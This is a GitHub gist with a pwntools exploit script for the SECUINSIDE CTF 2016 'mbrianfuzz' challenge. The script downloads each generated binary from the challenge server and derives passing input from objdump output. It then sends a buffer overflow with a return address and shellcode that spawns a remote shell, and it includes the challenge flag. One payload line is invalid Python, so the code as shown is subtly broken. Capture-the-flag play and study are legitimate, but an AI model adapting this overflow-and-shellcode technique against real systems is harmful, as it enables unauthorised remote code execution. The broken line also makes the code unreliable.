Skip to content

Instantly share code, notes, and snippets.

@L4ys
Created July 11, 2016 19:41
  • Star 0 You must be signed in to star a gist
  • Fork 0 You must be signed in to fork a gist
Star You must be signed in to star a gist
Save L4ys/73245e525433df23d599155ad7d3a806 to your computer and use it in GitHub Desktop.
exploit of SECUINSIDE CTF 2016 - mbrianfuzz
#!/usr/bin/env python
# -*- coding: utf-8 -*-
from pwn import *
from commands import getoutput
context.arch = "amd64"
# flag: E_gut_do_nuff_hae_bo_shi_ji
def aeg(binary):
buf = bytearray("\x00" * 324)
# get a1 a2 a3
lines = getoutput("objdump -M intel -d %s | grep jne -B 1 | grep cmp | grep ,0x" % binary).split("\n")[2:]
args = group(3, [int(line.split(",")[-1], 16) for line in lines])
args = [i[::-1] for i in args]
#print args
assert len(args) == 80
# get 4 index of each check function
lines = getoutput("objdump -M intel -d %s | grep movzx | grep rip+0x20" % binary).split("\n")
idx = group(4, [int(line.split(" ")[-2], 16)-0x606080 for line in lines])
idx = [i[::-1] for i in idx][:-1]
assert len(idx) == 80
for i in range(80):
buf[idx[i][0]] = chr(args[i][0])
buf[idx[i][1]] = chr(args[i][1])
buf[idx[i][2]] = chr(args[i][2])
buf[idx[i][3]] = chr(0x7f)
return buf
def from_remote(binary):
r = remote("chal.cykor.kr", 20002)
#r = remote("52.78.11.234", 20002)
r.recvuntil("SEND ME YOUR STRING TO EXPLOIT BRAND NEW BINARY (HEX ENCODED)\n")
b = r.recvuntil("\n\n", drop=True).decode("base64")
with open(binary, "wb") as f:
f.write(b)
os.system("chmod +x %s" % binary)
return r
def exploitable(binary, payload):
return "memcpy" in getoutput("ltrace -e memcpy %s %s" % (binary, enhex(str(payload)+"A" * 100)))
total_try = 0
exploitable_try = 0
local = False
while True:
if len(sys.argv) == 2:
local = True
binary = sys.argv[1]
else:
binary = "./bin"
r = from_remote(binary)
buf = aeg(binary)
total_try += 1
while not exploitable(binary, buf):
log.warn("unexploitable: %d/%d" % ( total_try - exploitable_try, total_try ) )
if local:
exit()
total_try += 1
r.close()
r = from_remote(binary)
buf = aeg(binary)
exploitable_try += 1
log.success("exploitable! %d/%d" % (exploitable_try, total_try))
payload = str(buf) + "A" * 10
payload += "A" * 24
payload += p64(0x6061EE)
payload += sc = asm(shellcraft.sh())
payload = enhex(payload)
if not local:
log.success("Spawning a shell...")
r.recvuntil(">>> ")
r.sendline(payload)
r.sendline("id")
res = r.recvrepeat(1)
if res:
print res
r.interactive()
exit()
log.warn("No response QQ")
r.close()
else:
os.system("%s %s" % (binary, payload))
exit()
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment